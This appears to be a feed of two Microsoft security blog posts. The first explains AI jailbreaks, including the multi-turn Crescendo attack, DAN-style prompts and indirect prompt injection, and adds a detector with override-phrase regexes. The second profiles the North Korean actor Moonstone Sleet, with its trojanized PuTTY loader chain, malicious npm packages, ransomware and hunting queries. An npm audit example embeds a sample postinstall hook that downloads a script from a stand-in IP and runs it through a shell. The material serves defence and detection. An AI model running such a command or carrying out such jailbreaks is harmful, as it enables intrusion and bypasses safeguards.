Here is an example of an attempt to ask an AI assistant to provide information about how to build a Molotov cocktail (firebomb). We know this knowledge is built into most of the generative AI models available today, but is prevented from being provided to the user through filters and other techniques to deny this request. Using a technique like Crescendo, however, the AI assistant can produce the harmful content that should otherwise have been avoided. This particular problem has since been addressed in Microsoft’s safety filters; however, AI models are still susceptible to it. Many variations of these attempts are discovered on a regular basis, then tested and mitigated.

Animated image showing the use of a Crescendo attack to ask ChatGPT to produce harmful content.
Figure 2. Crescendo attack to build a Molotov cocktail 

Why is generative AI susceptible to this issue?

When integrating AI into your applications, consider the characteristics of AI and how they might impact the results and decisions made by this technology. Without anthropomorphizing AI, the interactions are very similar to the issues you might find when dealing with people. You can consider the attributes of an AI language model to be similar to an eager but inexperienced employee trying to help your other employees with their productivity:

  1. Over-confident: They may confidently present ideas or solutions that sound impressive but are not grounded in reality, like an overenthusiastic rookie who hasn’t learned to distinguish between fiction and fact.
  2. Gullible: They can be easily influenced by how tasks are assigned or how questions are asked, much like a naïve employee who takes instructions too literally or is swayed by the suggestions of others.
  3. Wants to impress: While they generally follow company policies, they can be persuaded to bend the rules or bypass safeguards when pressured or manipulated, like an employee who may cut corners when tempted.
  4. Lack of real-world application: Despite their extensive knowledge, they may struggle to apply it effectively in real-world situations, like a new hire who has studied the theory but may lack practical experience and common sense.

In essence, AI language models can be likened to employees who are enthusiastic and knowledgeable but lack the judgment, context understanding, and adherence to boundaries that come with experience and maturity in a business setting.

So we can say that generative AI models and systems have the following characteristics:

  • Imaginative but sometimes unreliable
  • Suggestible and literal-minded, without appropriate guidance
  • Persuadable and potentially exploitable
  • Knowledgeable yet impractical for some scenarios

Without the proper protections in place, these systems can not only produce harmful content, but could also carry out unwanted actions and leak sensitive information.

Due to the nature of working with human language, generative capabilities, and the data used in training the models, AI models are non-deterministic, i.e., the same input will not always produce the same outputs. These results can be improved in the training phases, as we saw with the results of increased resilience in Phi-3 based on direct feedback from our AI Red Team. As all generative AI systems are subject to these issues, Microsoft recommends taking a zero-trust approach towards the implementation of AI; assume that any generative AI model could be susceptible to jailbreaking and limit the potential damage that can be done if it is achieved. This requires a layered approach to mitigate, detect, and respond to jailbreaks. Learn more about our AI Red Team approach.

Diagram of anatomy of an AI application, showing relationship with AI application, AI model, Prompt, and AI user.
Figure 3. Anatomy of an AI application

What is the scope of the problem?

When an AI jailbreak occurs, the severity of the impact is determined by the guardrail that it circumvented. Your response to the issue will depend on the specific situation and if the jailbreak can lead to unauthorized access to content or trigger automated actions. For example, if the harmful content is generated and presented back to a single user, this is an isolated incident that, while harmful, is limited. However, if the jailbreak could result in the system carrying out automated actions, or producing content that could be visible to more than the individual user, then this becomes a more severe incident. As a technique, jailbreaks should not have an incident severity of their own; rather, severities should depend on the consequence of the overall event (you can read about Microsoft’s approach in the AI bug bounty program).

Here are some examples of the types of risks that could occur from an AI jailbreak:

  • AI safety and security risks:
    • Unauthorized data access
    • Sensitive data exfiltration
    • Model evasion
    • Generating ransomware
    • Circumventing individual policies or compliance systems
  • Responsible AI risks:
    • Producing content that violates policies (e.g., harmful, offensive, or violent content)
    • Access to dangerous capabilities of the model (e.g., producing actionable instructions for dangerous or criminal activity)
    • Subversion of decision-making systems (e.g., making a loan application or hiring system produce attacker-controlled decisions)
    • Causing the system to misbehave in a newsworthy and screenshot-able way
    • IP infringement

How do AI jailbreaks occur?

The two basic families of jailbreak depend on who is doing them:

  • A “classic” jailbreak happens when an authorized operator of the system crafts jailbreak inputs in order to extend their own powers over the system.
  • Indirect prompt injection happens when a system processes data controlled by a third party (e.g., analyzing incoming emails or documents editable by someone other than the operator) who inserts a malicious payload into that data, which then leads to a jailbreak of the system.

You can learn more about both of these types of jailbreaks here.

There is a wide range of known jailbreak-like attacks. Some of them (like DAN) work by adding instructions to a single user input, while others (like Crescendo) act over several turns, gradually shifting the conversation to a particular end. Jailbreaks may use very “human” techniques such as social psychology, effectively sweet-talking the system into bypassing safeguards, or very “artificial” techniques that inject strings with no obvious human meaning, but which nonetheless could confuse AI systems. Jailbreaks should not, therefore, be regarded as a single technique, but as a group of methodologies in which a guardrail can be talked around by an appropriately crafted input.

Mitigation and protection guidance

To mitigate the potential of AI jailbreaks, Microsoft takes a defense-in-depth approach to protecting our AI systems, from models hosted on Azure AI to each Copilot solution we offer. When building your own AI solutions within Azure, the following are some of the key enabling technologies that you can use to implement jailbreak mitigations:

Diagram of layered approach to protecting AI applications, with filters for prompts, identity management and data access controls for the AP application, and content filtering and abuse monitoring for the AI model.
Figure 4. Layered approach to protecting AI applications.

With layered defenses, there are increased chances to mitigate, detect, and appropriately respond to any potential jailbreaks.

To empower security professionals and machine learning engineers to proactively find risks in their own generative AI systems, Microsoft has released an open automation framework, Python Risk Identification Toolkit for generative AI (PyRIT). Read more about the release of PyRIT for generative AI Red teaming, and access the PyRIT toolkit on GitHub.

When building solutions on Azure AI, use the Azure AI Studio capabilities to build benchmarks, create metrics, and implement continuous monitoring and evaluation for potential jailbreak issues.

Diagram showing Azure AI Studio capabilities
Figure 5. Azure AI Studio capabilities 

If you discover new vulnerabilities in any AI platform, we encourage you to follow responsible disclosure practices for the platform owner. Microsoft’s procedure is explained here: Microsoft AI Bounty Program.

Detection guidance

Microsoft builds multiple layers of detections into each of our AI hosting and Copilot solutions.

To detect attempts of jailbreak in your own AI systems, you should ensure you have enabled logging and are monitoring interactions in each component, especially the conversation transcripts, system metaprompt, and the prompt completions generated by the AI model.

Microsoft recommends setting the Azure AI Content Safety filter severity threshold to the most restrictive options, suitable for your application. You can also use Azure AI Studio to begin the evaluation of your AI application safety with the following guidance: Evaluation of generative AI applications with Azure AI Studio.
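Putting the layered approach and the detection guidance above into practice, here is an added example (not Microsoft's code and not from the article) of a guard around one LLM turn. It screens the prompt with illustrative DAN-style heuristics, screens the completion for a verbatim metaprompt leak, dispatches tool calls only from an allow-list with side-effecting tools held for human approval, grades a suspected jailbreak by its consequence as the "What is the scope of the problem?" section describes, and writes one JSON record per interaction carrying the metaprompt hash, the prompt and the completion. The metaprompt, the tool names, the "TOOL: name {json}" completion convention and the regex patterns are all assumptions made for the example.

```python
"""Layered guard around an LLM call. Added example, not Microsoft's code: it
screens the prompt, screens the completion, dispatches tools from an allow-list,
grades a suspected jailbreak by its consequence, and emits one JSON log record
per interaction so transcripts, metaprompt version and completions are all kept."""
import hashlib
import json
import re

# Hypothetical metaprompt. Only its hash goes in the log, so a transcript can be
# tied to the metaprompt version without copying the prompt into every record.
SYSTEM_METAPROMPT = "You are a support assistant. Answer only questions about Contoso orders."
METAPROMPT_HASH = hashlib.sha256(SYSTEM_METAPROMPT.encode()).hexdigest()[:16]

# Illustrative single-turn jailbreak heuristics (DAN-style phrasing). These are a
# first filter only; pair them with a content-safety classifier in production.
PROMPT_PATTERNS = {
    "override_instructions": re.compile(r"ignore (all |any |the )?(previous|prior|above) instructions", re.I),
    "persona_dan": re.compile(r"\bDAN\b|do anything now", re.I),
    "unrestricted_persona": re.compile(r"(act as|pretend to be|you are now) (an? )?(unfiltered|unrestricted)", re.I),
    "prompt_extraction": re.compile(r"(reveal|print|repeat|show) (me )?(your|the) (system |meta)?prompt", re.I),
}

# Least-privilege tool table (assumed): anything not listed is refused, and tools
# with side effects are held for human approval even when the model asks for them.
TOOLS = {
    "lookup_order": {"side_effect": False},
    "issue_refund": {"side_effect": True},
}


def screen_prompt(prompt: str) -> list:
    """Names of the heuristics the user prompt trips (empty list when clean)."""
    return [name for name, pat in PROMPT_PATTERNS.items() if pat.search(prompt)]


def screen_completion(completion: str) -> list:
    """Output-side check: the metaprompt appearing verbatim is a leak regardless
    of how the prompt looked. This is the layer that sees indirect injection."""
    return ["metaprompt_leak"] if SYSTEM_METAPROMPT in completion else []


def parse_tool_calls(completion: str) -> list:
    """Assumed completion convention: one 'TOOL: <name> <json-args>' per line."""
    return [{"name": m.group(1), "args": json.loads(m.group(2))}
            for m in re.finditer(r"^TOOL: (\w+) (\{.*\})$", completion, re.M)]


def dispatch(call: dict, prompt_flagged: bool, approved: bool) -> str:
    """Decide what happens to one tool call; returns a short outcome string."""
    spec = TOOLS.get(call["name"])
    if spec is None:
        return f"blocked:{call['name']}:not_allowlisted"
    if prompt_flagged:
        return f"blocked:{call['name']}:prompt_flagged"
    if spec["side_effect"] and not approved:
        return f"held:{call['name']}:needs_approval"
    return f"ran:{call['name']}"


def severity(flags: list, tool_results: list, audience: str) -> str:
    """Grade by consequence, not by the jailbreak technique itself."""
    if not flags:
        return "none"
    if any(r.startswith("ran:") for r in tool_results):
        return "high"        # a suspect interaction reached an automated action
    if audience == "shared":
        return "medium"      # content visible beyond the requesting user
    return "low"             # isolated: returned to a single user only


def guard(user: str, prompt: str, completion: str,
          audience: str = "single_user", approved: bool = False) -> dict:
    """Run every layer for one turn and return the log record (also JSON-dumped)."""
    prompt_flags = screen_prompt(prompt)
    flags = prompt_flags + screen_completion(completion)
    tool_results = [dispatch(c, bool(prompt_flags), approved)
                    for c in parse_tool_calls(completion)]
    record = {
        "user": user,
        "metaprompt_sha256_16": METAPROMPT_HASH,
        "prompt": prompt,
        "completion": completion,
        "flags": flags,
        "tool_results": tool_results,
        "audience": audience,
        "severity": severity(flags, tool_results, audience),
    }
    print(json.dumps(record))  # ship this line to your transcript store or SIEM
    return record
```

The completion-side check is the point of the design: prompt screening cannot see an indirect injection carried inside a document the model was asked to process, but the guard still catches the consequence (a metaprompt leak alongside a tool call that ran) and grades it high, which is the assume-breach posture the article recommends. A prompt that trips the heuristics has all of its tool calls blocked, so the worst it can do is return text to the requesting user.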

Summary

This article provides the foundational guidance and understanding of AI jailbreaks. In future blogs, we will explain the specifics of any newly discovered jailbreak techniques. Each one will articulate the following key points:

  1. We will describe the jailbreak technique discovered and how it works, with evidential testing results.
  2. We will have followed responsible disclosure practices to provide insights to the affected AI providers, ensuring they have suitable time to implement mitigations.
  3. We will explain how Microsoft’s own AI systems have been updated to implement mitigations to the jailbreak.
  4. We will provide detection and mitigation information to assist others to implement their own further defenses in their AI systems.

Richard Diver
Microsoft Security

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post AI jailbreaks: What they are and how they can be mitigated appeared first on Microsoft Security Blog.

Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks http://approjects.co.za/?big=en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ Tue, 28 May 2024 16:00:00 +0000 Microsoft has identified a new North Korean threat actor, now tracked as Moonstone Sleet (formerly Storm-1789), that combines many tried-and-true techniques used by other North Korean threat actors, as well as unique attack methodologies to target companies for its financial and cyberespionage objectives.

The post Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks appeared first on Microsoft Security Blog.

Microsoft has identified a new North Korean threat actor, now tracked as Moonstone Sleet (formerly Storm-1789), that combines many tried-and-true techniques used by other North Korean threat actors with unique attack methodologies to target companies for its financial and cyberespionage objectives. Moonstone Sleet has been observed setting up fake companies and job opportunities to engage with potential targets, employing trojanized versions of legitimate tools, creating a fully functional malicious game, and delivering a new custom ransomware.

Moonstone Sleet uses tactics, techniques, and procedures (TTPs) also used by other North Korean threat actors over the last several years, highlighting the overlap among these groups. While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.

This blog describes several notable TTPs used by this threat actor as well as recommendations to defend against related attacks. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their environments.

Who is Moonstone Sleet?

Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and that combines many tried-and-true techniques used by other North Korean threat actors with unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.

Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.

Moonstone Sleet tradecraft

Microsoft has observed Moonstone Sleet using the TTPs discussed in the following sections in various campaigns.

Trojanized PuTTY

In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022:

Screenshot of code from the trojanized PuTTY executable
Figure 1. Code from PuTTY executable

The trojanized PuTTY executable drops a custom installer which kicks off execution of a series of stages of malware, as described below:

  1. Stage 1 – Trojanized PuTTY: Decrypts, decompresses, and then executes the embedded stage 2 payload.
  2. Stage 2 – SplitLoader installer/dropper: Decrypts, decompresses, and writes the stage 3 payload, the SplitLoader DLL file, to disk. The installer also drops two encrypted files to disk, then executes SplitLoader via a scheduled task or registry run key.
  3. Stage 3 – SplitLoader: Decrypts and decompresses the two encrypted files dropped by the stage 2 payload, then combines them to create the next stage, another portable executable (PE) file.
  4. Stage 4 – Trojan loader: Expects a compressed and encrypted PE file from the C2. Once received, the trojan loader decompresses, decrypts, and executes this file.

Diagram of the Moonstone Sleet attack chain using trojanized PuTTY showing steps from initial access to impact.
Figure 2. Moonstone Sleet attack chain using trojanized PuTTY

Microsoft has also observed Moonstone Sleet using other custom malware loaders delivered by PuTTY that behaved similarly and had argument overlap with previously observed Diamond Sleet malware artifacts, such as the following:

Screenshot of artifact associated with Diamond Sleet malware

Malicious npm packages

Microsoft has observed Moonstone Sleet targeting potential victims with projects that used malicious npm packages. Often, the threat actor delivered these projects through freelancing websites or other platforms like LinkedIn. In one example, the threat actor used a fake company to send .zip files invoking a malicious npm package under the guise of a technical skills assessment. When loaded, the malicious package used curl to connect to an actor-controlled IP and drop additional malicious payloads like SplitLoader. In another incident, Moonstone Sleet delivered a malicious npm loader which led to credential theft from LSASS. Microsoft collaborated with GitHub to identify and remove repositories associated with this activity.
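A check a developer or reviewer can run before installing a "skills assessment" project, added here as an example (not Microsoft's or npm's code): it reads every package.json in a checkout, including those under node_modules, and flags lifecycle hooks such as postinstall that npm runs automatically during install, especially when the hook command downloads or executes remote content, which is the behaviour described above. The manifest embedded at the bottom is constructed for the example, and the indicator regexes and risk labels are assumptions, not a published detection.

```python
"""Audit npm manifests for install-time hooks that fetch or run remote content.
Added example, not Microsoft's or npm's code; the sample manifest is constructed."""
import json
import re
import sys
from pathlib import Path

# npm runs these scripts automatically during `npm install`, with no prompt.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Indicator regexes assumed for the example; tune them for your own environment.
SUSPICIOUS = {
    "downloader": re.compile(r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr)\b", re.I),
    "url_or_ip": re.compile(r"https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b", re.I),
    "inline_eval": re.compile(r"\bnode\s+(-e|--eval)\b|\beval\(|\bnew Function\(", re.I),
    "encoded_payload": re.compile(r"base64|\\x[0-9a-f]{2}", re.I),
    "shell_spawn": re.compile(r"\b(powershell|pwsh|cmd(\.exe)?\s*/c|sh\s+-c)\b", re.I),
}


def audit_manifest(manifest: dict, source: str = "package.json") -> list:
    """Return one finding per script that is an install hook, suspicious, or both."""
    findings = []
    for hook, cmd in (manifest.get("scripts") or {}).items():
        if not isinstance(cmd, str):
            continue
        hits = [name for name, pat in SUSPICIOUS.items() if pat.search(cmd)]
        if hook in LIFECYCLE_HOOKS and hits:
            risk = "high"       # runs on install and reaches out or evaluates code
        elif hook in LIFECYCLE_HOOKS:
            risk = "review"     # any install-time hook deserves a look
        elif hits:
            risk = "medium"     # only runs when someone invokes it, but still odd
        else:
            continue
        findings.append({"source": source, "hook": hook, "command": cmd,
                         "indicators": hits, "risk": risk})
    return findings


def audit_tree(root: Path) -> list:
    """Walk a checkout including node_modules: a hook can hide in a dependency."""
    findings = []
    for pj in sorted(root.rglob("package.json")):
        try:
            manifest = json.loads(pj.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        if isinstance(manifest, dict):
            findings.extend(audit_manifest(manifest, str(pj.relative_to(root))))
    return findings


# Constructed manifest resembling a "technical skills assessment" project.
# 203.0.113.10 is a documentation address, used here as a stand-in for an
# actor-controlled IP.
SAMPLE_MANIFEST = json.loads("""
{
  "name": "frontend-assessment",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s http://203.0.113.10/setup.sh | sh",
    "test": "jest"
  }
}
""")

if __name__ == "__main__":
    results = (audit_tree(Path(sys.argv[1])) if len(sys.argv) > 1
               else audit_manifest(SAMPLE_MANIFEST))
    for finding in results:
        print(json.dumps(finding))
    sys.exit(1 if any(f["risk"] == "high" for f in results) else 0)
```

Run it as `python audit_npm.py path/to/checkout` before `npm install`; it exits non-zero on a high-risk finding so it can gate a CI step. Running the install with `--ignore-scripts` is the complementary control when you have to build the project anyway.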

Malicious tank game

Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar[.]com and defitankzone[.]com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.

Screenshot of Moonstone Sleet X (Twitter) account for its DeTankWar game
Figure 3. Example of a Moonstone Sleet X (Twitter) account for its DeTankWar game

Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:

Screenshot of email that Moonstone Sleet uses to distribute links to their malicious game
Figure 4. Moonstone Sleet using CC Waterfall to email a link to their game

When targeted users launch the game, delfi-tank-unity.exe, additional included malicious DLLs are also loaded. The payload is a custom malware loader that Microsoft tracks as YouieLoad. Similarly to SplitLoader, YouieLoad loads malicious payloads in memory and creates malicious services that perform functions such as network and user discovery and browser data collection. For compromised devices of particular interest to the group, the threat actor launches hands-on-keyboard commands with further discovery and conducts credential theft.

Screenshot of a page from the DeTankWar website
Figure 5. Page from the DeTankWar website

Ransomware

In April 2024, Microsoft observed Moonstone Sleet delivering a new custom ransomware variant we have named FakePenny against a company it previously compromised in February. FakePenny includes a loader and an encryptor. Although North Korean threat actor groups have previously developed custom ransomware, this is the first time we have observed this threat actor deploying ransomware.

Microsoft assesses that Moonstone Sleet’s objective in deploying the ransomware is financial gain, suggesting the actor conducts cyber operations for both intelligence collection and revenue generation. Of note, the ransomware note dropped by FakePenny closely overlaps with the note used by Seashell Blizzard in its malware NotPetya. The ransom demand was $6.6M USD in BTC. This is in stark contrast to the lower ransom demands of previous North Korean ransomware attacks, like WannaCry 2.0 and H0lyGh0st.

Screenshot of the FakePenny ransomware note, which bears a resemblance to the NotPetya ransomware note
Figure 6. FakePenny ransomware note
Screenshot of the NotPetya ransomware note
Figure 7. NotPetya ransomware note

Fake companies

Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.

StarGlow Ventures

From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI.

Screenshot of an email that Moonstone Sleet used in its StarGlow Ventures campaign
Figure 8. Example of an email from Moonstone Sleet’s StarGlow Ventures campaign

These emails also contained a 1×1 tracking pixel, which likely enabled Moonstone Sleet to track which targets engaged with the emails, and a link to a dummy unsubscribe page hosted on the StarGlow Ventures domain. While the emails did not contain any malicious links, Microsoft assesses Moonstone Sleet likely used this campaign to establish a relationship with target organizations. Although the purpose of these relationships is unclear, they may afford the actor access to organizations of interest or be used as revenue generation opportunities. Microsoft notified customers who were impacted by this Moonstone Sleet campaign.

Screenshot of the Unsubscribe page on the StarGlow Ventures website with the words "You are Unsubscribed Now."
Figure 9. Unsubscribe page on the StarGlow Ventures website
Search results for "StarGlow Ventures" showing the StarGlow website and pages like "Portfolio" and "Let's discuss your future product" among others.
Figure 10. Informational pages for the StarGlow Ventures website

C.C. Waterfall

In a similar campaign, Moonstone Sleet sent emails using its fake company C.C. Waterfall, a purported IT consulting organization.

Screenshot of website for C.C. Waterfall.
Figure 11. The landing page for C.C. Waterfall

In this campaign, Moonstone Sleet emailed higher education organizations, claiming the company was either hiring new developers or looking for business collaboration opportunities. This campaign likely had similar goals to the StarGlow Ventures campaign: to build relationships with organizations which could be leveraged for revenue generation or malicious access.  

Screenshot of an email used for the C.C. Waterfall campaign
Figure 12. Example of an email from C.C. Waterfall

As previously mentioned, Moonstone Sleet also used C.C. Waterfall to contact targets and invite them to download the actor’s tank game, highlighting that this is a coordinated and concerted effort for which Moonstone Sleet can leverage multiple facets of its operations in overlapping campaigns.

Work-for-hire

In addition to creating fake companies, Microsoft has observed Moonstone Sleet pursuing employment in software development positions at multiple legitimate companies. This activity could be consistent with previous reporting from the United States Department of Justice that North Korea was using highly skilled remote IT workers to generate revenue. On the other hand, this Moonstone Sleet activity may also be another approach to gaining access to organizations.

Moonstone Sleet targets

Moonstone Sleet’s primary goals appear to be espionage and revenue generation. Targets to date include both individuals and organizations in the software and information technology, education, and defense industrial base sectors.

Software companies and developers

Since early January 2024, Moonstone Sleet has used the above fake software development companies to solicit work or cooperation. This actor has also targeted individuals looking for work in software development, sending candidates a “skills test” that instead delivers malware via a malicious npm package.

Aerospace

In early December 2023, we observed Moonstone Sleet compromising a defense technology company to steal credentials and intellectual property. In April 2024, the actor ransomed the organization using FakePenny. The same month, we observed Moonstone Sleet compromise a company that makes drone technology. In May 2024, the threat actor compromised a company that makes aircraft parts.

Fitting into the North Korean threat actor landscape

Moonstone Sleet’s diverse set of tactics is notable not only because of its effectiveness, but because of how it has evolved from those of several other North Korean threat actors over many years of activity to meet North Korean cyber objectives. For example, North Korea has for many years maintained a cadre of remote IT workers to generate revenue in support of the country’s objectives. Moonstone Sleet’s pivot to conducting IT work within its campaigns indicates it may not only be helping with this strategic initiative, but possibly also expanding the use of remote IT workers beyond just financial gain. Additionally, Moonstone Sleet’s addition of ransomware to its playbook, like another North Korean threat actor, Onyx Sleet, may suggest it is expanding its set of capabilities to enable disruptive operations. Microsoft reported on Onyx Sleet’s and Storm-0530’s H0lyGh0st ransomware in 2022.

Moonstone Sleet’s ability to conduct concurrent operations across multiple campaigns, the robustness of the malicious game, and the use of a custom new ransomware variant are strong indications that this threat actor may be well-resourced. Moreover, given that Moonstone Sleet’s initial attacks mirrored Diamond Sleet methodologies and heavily reused Diamond Sleet’s code in their payloads, Microsoft assesses this actor is equipped with capabilities from prior cyber operations conducted by other North Korean actors.

Microsoft has identified several techniques used by Moonstone Sleet that have previously been used by other North Korean threat actors. For example, since late 2023, an actor that Microsoft tracks as Storm-1877 has used malicious npm packages in a campaign targeting software developers with JavaScript-based malware. This campaign was reported publicly by Palo Alto Networks as Contagious Interview. Additionally, in 2023, GitHub reported that Jade Sleet used malicious npm packages in a campaign consisting of fake developer and recruiter personas that operated on LinkedIn, Slack, and Telegram. This shared use of a relatively uncommon tactic across multiple distinct North Korean groups may suggest sharing of expertise and TTPs among North Korean threat actors.

In recent months, Microsoft and other security researchers have reported on North Korean threat actors’ use of software supply chain attacks to conduct widespread malicious operations. In November 2023, Microsoft reported on Diamond Sleet’s supply chain compromise of CyberLink, a multimedia application. While Microsoft has not yet identified any Moonstone Sleet supply chain attacks, the actor has extensively targeted software development firms in its campaigns. Large-scale access to software companies would pose a particularly high risk for future supply chain attacks against those organizations.

Moonstone Sleet’s appearance is an interesting development considering that North Korea has carried out a series of changes in its foreign relations and security apparatus. In November 2023, North Korea closed embassies in several countries, and in March 2024, may have dissolved the United Front Department (UFD), an agency believed to be responsible for reunification and propaganda.

Despite being new, Moonstone Sleet has demonstrated that it will continue to mature, develop, and evolve, and has positioned itself to be a preeminent threat actor conducting sophisticated attacks on behalf of the North Korean regime.

Recommendations

Microsoft recommends the following mitigations to defend against attacks by Moonstone Sleet:

  • Detect human-operated ransomware attacks with Microsoft Defender XDR. 
  • Enable controlled folder access
  • Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
  • Enable network protection in Microsoft Defender for Endpoint. 
  • Follow the credential hardening recommendations in our on-premises credential theft overview to defend against common credential theft techniques like LSASS access.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.    
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.

Microsoft Defender XDR customers can turn on the following attack surface reduction rule to prevent common attack techniques used by Moonstone Sleet.

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network: 

  • Moonstone Sleet actor activity detected
  • Suspicious activity linked to a North Korean state-sponsored threat actor has been detected
  • Diamond Sleet Actor activity detected

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity: 

  • Malicious credential theft tool execution detected  
  • Mimikatz credential theft tool 
  • Ransomware-linked threat actor detected
  • Suspicious access to LSASS service

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Detect Procdump dumping LSASS credentials:

DeviceProcessEvents
| where (FileName has_any ("procdump.exe", "procdump64.exe") and ProcessCommandLine has "lsass")
    or (ProcessCommandLine has "lsass.exe" and (ProcessCommandLine has "-accepteula" or ProcessCommandLine contains "-ma"))

Detect connectivity with C2 infrastructure:

let c2servers = dynamic(['mingeloem.com','matrixane.com']);
DeviceNetworkEvents
| where RemoteUrl has_any (c2servers)
| project DeviceId, LocalIP, DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp

Detect connectivity to DeTank websites:

let c2servers = dynamic(['detankwar.com','defitankzone.com']);
DeviceNetworkEvents
| where RemoteUrl has_any (c2servers)
| project DeviceId, LocalIP, DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel customers can also use the queries below to detect activity detailed in this blog.

This query detects the installation of a Windows service that contains artifacts from credential dumping tools such as Mimikatz:

This query detects the use of Procdump to dump credentials from LSASS memory:

Microsoft Sentinel customers can also use the following query, which looks for Microsoft Defender AV detections related to Moonstone Sleet. In Microsoft Sentinel, the SecurityAlert table includes only the DeviceName of the affected device. This query joins the DeviceInfo table to connect other information such as device group, IP, signed-in users, etc., allowing analysts to have more context related to the alert, if available:

let MoonStoneSleet_threats = dynamic(["Behavior:Win64/PennyCrypt", "HackTool:Win32/Mimikatz", "HackTool:Win64/Mimikatz", "TrojanDropper:Win32/SplitLoader", "TrojanDropper:Win64/YouieLoad"]);
SecurityAlert
| where ProviderName == "MDATP"
| extend ThreatName = tostring(parse_json(ExtendedProperties).ThreatName)
| extend ThreatFamilyName = tostring(parse_json(ExtendedProperties).ThreatFamilyName)
| where ThreatName in~ (MoonStoneSleet_threats) or ThreatFamilyName in~ (MoonStoneSleet_threats)
| extend CompromisedEntity = tolower(CompromisedEntity)
| join kind=inner (
    DeviceInfo
    | extend DeviceName = tolower(DeviceName)
) on $left.CompromisedEntity == $right.DeviceName
| summarize arg_max(TimeGenerated, *) by DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, tostring(LoggedOnUsers), DeviceId, TenantId, CompromisedEntity, ProductName, Entities
| extend HostName = tostring(split(CompromisedEntity, ".")[0]), DomainIndex = toint(indexof(CompromisedEntity, '.'))
| extend HostNameDomain = iff(DomainIndex != -1, substring(CompromisedEntity, DomainIndex + 1), CompromisedEntity)
| project-away DomainIndex
